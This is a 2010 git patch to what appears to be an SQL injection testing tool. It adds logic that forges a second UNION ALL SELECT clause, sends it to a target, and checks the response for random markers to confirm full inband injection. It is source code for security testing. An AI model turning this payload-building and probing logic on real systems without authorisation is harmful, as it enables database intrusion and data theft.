From c1f2534e9a7965128200ef88d65e5c343f8966ce Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 22 Dec 2010 15:47:52 +0000
Subject: [PATCH] More bug fixes to properly distinguish between full inband
 and single-entry inband sql injections

---
 lib/core/agent.py                   | 18 +++++++++++++++++-
 lib/techniques/inband/union/test.py | 18 ++++++++++++++++++
 2 files changed, 35 insertions(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 04e8f5e31..173559f79 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -483,7 +483,7 @@ class Agent:
 
         return concatenatedQuery
 
-    def forgeInbandQuery(self, query, exprPosition=None, nullChar=None, count=None, comment=None):
+    def forgeInbandQuery(self, query, exprPosition=None, nullChar=None, count=None, comment=None, multipleUnions=None):
         """
         Take in input an query (pseudo query) string and return its
         processed UNION ALL SELECT query.
@@ -569,6 +569,22 @@ class Agent:
         if intoRegExp:
             inbandQuery += intoRegExp
 
+        if multipleUnions:
+            inbandQuery += " UNION ALL SELECT "
+
+            for element in range(count):
+                if element > 0:
+                    inbandQuery += ", "
+
+                if element == exprPosition:
+                    inbandQuery += multipleUnions
+                else:
+                    inbandQuery += nullChar
+
+            if kb.dbms == DBMS.ORACLE:
+                inbandQuery += " FROM DUAL"
+
+
         inbandQuery = self.suffixQuery(inbandQuery, comment)
 
         return inbandQuery
diff --git a/lib/techniques/inband/union/test.py b/lib/techniques/inband/union/test.py
index 3be9df49a..c76043534 100644
--- a/lib/techniques/inband/union/test.py
+++ b/lib/techniques/inband/union/test.py
@@ -8,6 +8,8 @@ See the file 'doc/COPYING' for copying permission
 """
 
 from lib.core.agent import agent
+from lib.core.common import getUnicode
+from lib.core.common import parseUnionPage
 from lib.core.common import randomStr
 from lib.core.data import conf
 from lib.core.data import kb
@@ -46,6 +48,22 @@ def __unionPosition(negative=False, count=None, comment=None):
             setUnion(position=exprPosition)
             validPayload = payload
 
+            if not negative:
+                # Prepare expression with delimiters
+                randQuery2 = randomStr()
+                randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
+                randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
+
+                # Confirm that it is a full inband SQL injection
+                query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition, count=count, comment=comment, multipleUnions=randQueryUnescaped2)
+                payload = agent.payload(newValue=query, negative=negative)
+
+                # Perform the request
+                resultPage, _ = Request.queryPage(payload, content=True)
+
+                if resultPage and (randQuery not in resultPage or randQuery2 not in resultPage):
+                    setUnion(negative=True)
+
             break
 
     return validPayload